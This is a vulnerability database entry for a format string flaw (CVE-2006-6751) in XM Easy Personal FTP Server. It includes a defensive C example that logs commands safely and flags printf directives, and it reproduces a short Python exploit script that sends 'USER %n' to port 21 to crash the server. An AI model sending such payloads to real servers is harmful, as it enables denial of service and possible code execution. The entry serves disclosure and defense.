XM Easy Personal FTP Server Server Log Output Denial of Service or Arbitrary Code Execution Vulnerability

Vulnerability ID: 1111833
Vulnerability type: Format string
Published: 2006-12-22
Updated: 2007-08-07
CVE ID: CVE-2006-6751
CNNVD-ID: CNNVD-200612-531
Platform: Windows
CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/2978
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200612-531
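|Vulnerability details
XM Easy Personal FTP Server is a simple, easy-to-use personal FTP server tool. It contains a format string error in the Server log output that displays server activity. An attacker can cause a denial of service or execute arbitrary code by sending the server a specially crafted command that contains format specifiers. In addition, sending specially crafted commands may also trigger various buffer overflows.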
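The bug class described above, shown from the defender's side as an added example (not code from the product or from the original advisory): a log call that treats the client command as data rather than as a format string, plus a scanner that flags printf-style directives in incoming commands. All function and type names are hypothetical, and the sample commands are constructed.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical names throughout; this is not XM Easy Personal FTP Server code. */
typedef struct { int directives; int writes; } fmt_scan;

/* Log a client command as data. The vulnerable form of this call would be
   snprintf(out, n, cmd), which lets the client choose the format string. */
int log_command_safe(char *out, size_t n, const char *cmd)
{
    return snprintf(out, n, "%s", cmd);
}

/* Count printf-style conversion directives in a command line so the
   server or a log monitor can flag it; "%n"-family directives are counted
   separately because they write to memory instead of reading it. */
fmt_scan scan_format_directives(const char *s)
{
    fmt_scan r = {0, 0};
    while ((s = strchr(s, '%')) != NULL) {
        s++;                                  /* step past '%' */
        if (*s == '%') { s++; continue; }     /* "%%" is a literal percent */
        s += strspn(s, "-+ #0123456789$*.");  /* flags, position, width, precision */
        s += strspn(s, "hlLqjzt");            /* length modifiers */
        if (*s && strchr("diouxXeEfFgGaAcspn", *s)) {
            r.directives++;
            if (*s == 'n')
                r.writes++;
        }
    }
    return r;
}

int main(void)
{
    /* Constructed sample commands, not captured traffic. */
    const char *samples[] = { "USER alice", "USER %n", "USER %08x%08x%hn" };
    char line[128];
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        fmt_scan r = scan_format_directives(samples[i]);
        log_command_safe(line, sizeof line, samples[i]);
        printf("[log] %-20s directives=%d writes=%d\n", line, r.directives, r.writes);
    }
    return 0;
}
```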
|Exploit
import sys,os,string
import socket
import time

print "-----------------------------------------------------------------------"
print "# XM Easy Personal FTP Server 5.2.1 format string Denial of Service"
print "# url: http://www.dxm2008.com/"
print "# author: shinnai"
print "# mail: shinnai[at]autistici[dot]org"
print "# site: http://shinnai.altervista.org"
print "-----------------------------------------------------------------------"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
   conn = s.connect(("127.0.0.1",21))
except:
   print "- Unable to connect. exiting."
   sys.exit(1)

d = s.recv(1024)
time.sleep(2)
s.send('USER %s\r\n' % "%n") # or use every available command or really what you like
time.sleep(2)                # I try to use CFGHT command and it works :)

# milw0rm.com [2006-12-22]
|References

Source: XF
Name: xm-ftpserver-user-dos(31140)
Link: http://xforce.iss.net/xforce/xfdb/31140
Source: BID
Name: 22747
Link: http://www.securityfocus.com/bid/22747
Source: BID
Name: 18632
Link: http://www.securityfocus.com/bid/18632
Source: VUPEN
Name: ADV-2007-0786
Link: http://www.frsirt.com/english/advisories/2007/0786
Source: MISC
Link: http://downloads.securityfocus.com/vulnerabilities/exploits/22747.pl
Source: MISC
Link: http://downloads.securityfocus.com/vulnerabilities/exploits/18632.txt